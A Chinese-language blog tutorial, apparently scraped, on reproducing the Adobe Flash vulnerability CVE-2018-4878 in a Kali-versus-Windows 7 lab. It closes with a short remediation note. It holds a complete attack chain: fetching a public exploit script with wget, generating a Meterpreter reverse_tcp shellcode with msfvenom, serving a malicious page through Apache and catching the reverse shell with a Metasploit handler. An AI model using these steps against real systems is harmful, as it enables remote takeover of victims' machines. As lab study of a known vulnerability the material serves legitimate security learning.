Flash 0day(CVE-2018-4878)復現過程

1、前言介紹 html

2018年2月1號,Adobe官方發佈安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其以前的版本,存在高危漏洞(CVE-2018-4878)。python

從Adobe公告來看,這個漏洞的野外攻擊樣本最先是由韓國計算機應急響應小組(KRCERT)發現的,而KR-CERT也表示,來自朝鮮的黑客組織已經成功利用這個0Day 漏洞發 起攻擊。git

攻擊者經過構造特殊的Flash連接,當用戶用瀏覽器/郵件/Office訪問此Flash連接時,會 被「遠程代碼執行」,而且直接被getshell。github

2、本文測試環境 web

攻擊機:kali IP:192.168.44.128shell

靶機:windows7 IP:192.168.44.140+IE8+FLASH Player28.0.0.137(及之前版本)apache

 

一、下載CVE-2018-4878利用腳本到kali機 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018- 4878.rarwindows

二、解壓後以下圖,可看到cve-2018-4878.py,exploit.swf  其實以後咱們仍是要本身生成一個index2.html的瀏覽器

 

 

三、Windows7 安裝flash插件安全

 

 

3、漏洞復現

一、先在kali裏面把cve-2018-4878.py的stageless = True修改爲False

 

 

二、使用msf生成shell代碼

msfvenom  -p   windows/meterpreter/reverse_tcp   lhost=your host  lport=your port  -f  python>shellcode.txt

其中:lhost爲kali的ip地址,lport爲監聽的端口

 

 

查看生成的shellcode.txt

 

 

三、將生成的shellcode.txt的內容更換到cve-2018-4878.py的shellcode

 

 

四、在kali下執行cve-2018-4878.py,注意要和index2.html,在同一個文件夾下

 

 

五、在kali裏面開啓Apache2服務,並將兩個文件放到/var/www/html目錄(apache web路徑)

 

 

 

 

如今,kali上的web服務已經啓動,而且已經有了index2.html這個web頁面,咱們須要用靶機win7訪問這個頁面

 

六、kali上開啓shell會話監聽

進入msf,使用handler監聽模塊

 

 

回彈一個tcp鏈接

 

 

設置kali的ip,監聽的端口號

 

 

啓動服務

 

 

七、使用win7靶機的已開啓flash服務的瀏覽器進行訪問index2.html

 

 

八、回到kali,已經進入meterpreter模塊

 

 

九、當靶機訪問惡意的index2.html頁面,便可觸發反彈shell

 

 

4、漏洞修復

將flash經過官網升級到最新版本

https://www.flash.cn/

或者,關閉flash的使用

相關文章
相關標籤/搜索